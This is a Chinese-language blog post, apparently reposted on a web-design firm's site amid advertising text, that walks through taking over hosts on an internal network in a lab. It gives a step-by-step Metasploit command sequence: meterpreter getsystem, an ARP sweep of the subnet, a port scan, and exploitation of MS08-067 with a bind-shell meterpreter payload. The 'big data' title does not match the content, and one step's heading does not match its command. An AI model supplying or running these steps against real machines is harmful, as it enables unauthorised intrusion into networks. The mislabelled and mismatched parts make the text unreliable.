大數(shù)據(jù)中如何獲取內(nèi)網(wǎng)中其他主機權限,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。
創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務,包含不限于成都網(wǎng)站制作、成都網(wǎng)站設計、貢嘎網(wǎng)絡推廣、微信平臺小程序開發(fā)、貢嘎網(wǎng)絡營銷、貢嘎企業(yè)策劃、貢嘎品牌公關、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等,從售前售中售后,我們都將竭誠為您服務,您的肯定,是我們最大的嘉獎;創(chuàng)新互聯(lián)為所有大學生創(chuàng)業(yè)者提供貢嘎建站搭建服務,24小時服務熱線:028-86922220,官方網(wǎng)址:m.rwnh.cn
環(huán)境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.144
小小受:win7 x64 ,ip: 192.168.1.130
一、生成木馬及監(jiān)聽主機參考上篇文章:
內(nèi)網(wǎng)滲透 -- 提升權限(利用提權漏洞)
二、獲取小受的IP地址
meterpreter > getsystem
三、獲取內(nèi)網(wǎng)中存活的主機,以一臺win03主機為例
meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24
四、端口掃描,看看小小受開放了那些端口
1、選擇用到的模塊:
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
2、查看需要配置的參數(shù):
show options
3、設置要掃描的端口:
msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306
4、設置小小受ip地址:
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130
5、執(zhí)行:
msf5 auxiliary(scanner/portscan/tcp) > run
五、利用ms08_067漏洞拿下小小受
1、搜索ms08_067模塊信息
msf5 auxiliary(scanner/portscan/tcp) > search ms08_067
2、選擇該模塊并設置payload
msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
3、查看需要配置的參數(shù):
msf5 exploit(windows/smb/ms08_067_netapi) > show options
4、設置目標主機并執(zhí)行
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130msf5 exploit(windows/smb/ms08_067_netapi) > run
關于大數(shù)據(jù)中如何獲取內(nèi)網(wǎng)中其他主機權限問題的解答就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關知識。
文章標題:大數(shù)據(jù)中如何獲取內(nèi)網(wǎng)中其他主機權限
瀏覽地址:http://m.rwnh.cn/article38/igjgpp.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供外貿(mào)建站、網(wǎng)站改版、關鍵詞優(yōu)化、全網(wǎng)營銷推廣、做網(wǎng)站、網(wǎng)站維護
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)